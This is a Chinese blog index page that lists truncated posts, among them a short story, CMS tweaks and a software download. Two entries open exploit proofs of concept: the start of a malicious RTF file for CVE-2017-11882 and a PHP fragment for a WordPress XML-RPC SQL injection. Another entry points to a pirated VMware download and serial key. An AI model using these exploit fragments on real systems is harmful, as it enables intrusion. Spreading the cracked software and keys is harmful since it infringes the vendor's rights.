《如果在天堂遇见你》 作者:无名

Write by webmaster in at 2018-06-27 16:56:18

当这栋五层的楼房倒塌时,霜正在一楼的办公室里加班,吃着石给她送来的夜宵。他俩是一对新婚数月的小夫妻,恩爱非常。霜有一份报表必须在明天上交,于是石带了夜宵来陪妻子,并和她一起查对着文件中的数据。霜看着丈夫,心情就象窗外的星空一般,灿烂无比。石怜爱地摸着她的头发,命令着说:“乖,去吃东西。我来查。”于是霜乖乖地端着夜宵坐到石的对面,一边吃一边满含柔情地盯着他。她相信,只要丈夫出马,这世上便没什么办不到的事。果然,不到一刻钟,石便找出了错误。而就在此时,这栋早在一年前便说要拆而勉强使用的办公楼,竟毫无征兆地轰然倒塌了。

几秒钟之内,两人便被埋在了废墟之中。不知过了多久,当霜从昏迷中醒来时,眼前…(more…)

CVE-2017-11882 POC

Write by webmaster in at 2018-06-27 10:35:38

CVE-2017-11882 POC
{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
{\*\generator Riched20 6.3.9600}\viewkind4\uc1
\pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 01050000020000000b00000…(more…)

WordPress(4.8.2及以下版本) SQL注入漏洞利用

Write by webmaster in at 2018-06-27 10:34:01

POC
$usr = ‘author’;
$pwd = ‘author’;
$xmlrpc = ‘http://local.target/xmlrpc.php’;
$client = new IXR_Client($xmlrpc);
$content = array(“ID” => 6, ‘meta_input’ => array(“_thumbnail_id”=>”xxx”));
$res = $client->query(‘wp.editPost’,0, $usr, $pwd, 6/post_id/, $content);
添加自定义字段,meta_k…(more…)

VMware Fusion 8 Pro for Mac 8.0.2 中文版

Write by webmaster in at 2018-06-27 10:31:04

今天和大家分享最新的VMware Fusion 8 Pro for Mac 8.0.2 版本,VMware Fusion 8 针对 Windows 10、OS X El Capitan 和最新的 Retina Mac 进行了优化,并且大幅提高了性能,是PD之外的另一个选择,在各种功能上和PD可以说差不多,并且要知道论虚拟机技术,VMware可是行业老大,VMware Fusion自然也会非常棒!

下载地址:链接:https://pan.baidu.com/s/1o8MKcrC 密码:tt8i

文件打开密码为:www.ifunmac.com

网上找的可用的序列号:FY7N2-6…(more…)

Mac 与windows 下的打字机声音软件

Write by webmaster in at 2018-06-27 10:29:02

ickeys 是一款免费开源的键盘音效工具,可以在键入时模拟「打字机」的声音,也有「爆裂鼓手」「机械键盘」「冒泡」「剑气」等声音方案,支持 Mac、Windows、Linux 三大平台。如果你经常在深夜写作,不妨尝试一下这个键盘音效小工具:Tickeys。如果对味,它一定会让码字成为一种享受。

多种声音方案:「打字机」模式情怀爆表

三个平台安装过程比较简单,注:Mac 版本的在使用前需要在软件添加到「安全性与隐私 – 辅助功能 的列表中。

打开软件后,依次按下「QAZ123」就可以开启音效与设置面板。Tickeys 设置非常简单,在通用选项卡中你可以选择喜欢的声音方案,音量与…(more…)

CMSeek:CMS 检测与漏洞利用工具集

Write by webmaster in at 2018-06-27 10:26:45

什么是CMS?

CMS,即 Content Management System ,英文缩写是CMS,中文全称是“网站内容管理系统”。一些比较优秀的的cms系统:Wordpress,Joomla,Drupal等。

CMSeek的功能:

  • 基本CMS检测超过20个CMS
  • 高级Wordpress扫描
  • 检测版本
  • 检测用户(3种检测方法)
  • 寻找版本漏洞和更多!
  • 模块化强力系统
  • 使用预制bruteforce模块或创建…

(more…)

浅谈绕过WAF的数种方法

Write by webmaster in at 2018-06-16 10:46:38

EMail: rayh4c#80sec.com
Site: http://www.80sec.com
Date: 2011-09-06
From: http://www.80sec.com/?p=244

0×00 前言

08年初诞生了一种SQL群注攻击,黑客在全球范围内对asp,asp.net加MSSQL架构的网站进行了疯狂扫荡。由于MSSQL支持多语句注入,黑客通过一条结合游标的SQL语句就能将整个数据库的字段内容自动进行篡改,可以在网站上无差别的进行网页木马攻击。

互联网是快速更新迭代的,但是很多没有开发能力的单位都是通过外包建立网站,网站的程序一上线就再也无人维护…(more…)

帝国cms去除调用栏目时的括号[]

Write by webmaster in at 2018-06-16 10:44:53

最近在研究帝国cms,发现调用栏目时会出现[我是栏目]这样的括号,极大的影响网站美观。度娘后无果便自行研究了,最后解决方案如下:

首先找到e/class/connect.php这个文件,打开搜索:$myadd=”[<a href=”.$classurl.”>”.$classname.”</a>]”;

大概在2440行左右会出现以下code:
if(empty($class_r[$r[classid]][bname]))
{$classname=$class_r[$r[classid]][classname];}
else
{$classname=$c…(more…)

ckeditor编辑器上传图片自动去除style宽度与高度尺寸

Write by webmaster in at 2018-06-16 10:41:41

打开ckeditor/plugins/image/dialogs目录中的image.js
查找:this.imageElement.getAttribute(“style”)
把this.imageElement.getAttribute(“style”) || this.imageElement.removeAttribute(“style”);
修改为:this.imageElement.setAttribute(“style”)&&this.imageElement.removeAttribute(“style”)

WordPress 代码高亮插件:Pure-Highlightjs(支持可视化下插入代码)

Write by webmaster in at 2018-06-16 10:40:52

Pure-Highlightjs 一个基于 Highlightjs 实现的 WordPress 代码高亮插件,支持 N 多种语言高亮,还提供多种主题。支持在 WordPress 可视化编辑模式下插入代码。

Pure-Highlightjs 依赖于以下开源项目:

highlight.js https://highlightjs.org

highlight.js 是一个用于在任何 web 页面上着色显示各种示例源代码语法的 JS 项目

安装说明

1.下载
点击下载 https://github.com/icodechef/…/Pure-Highlightjs_1.0…(more…)

下一页 »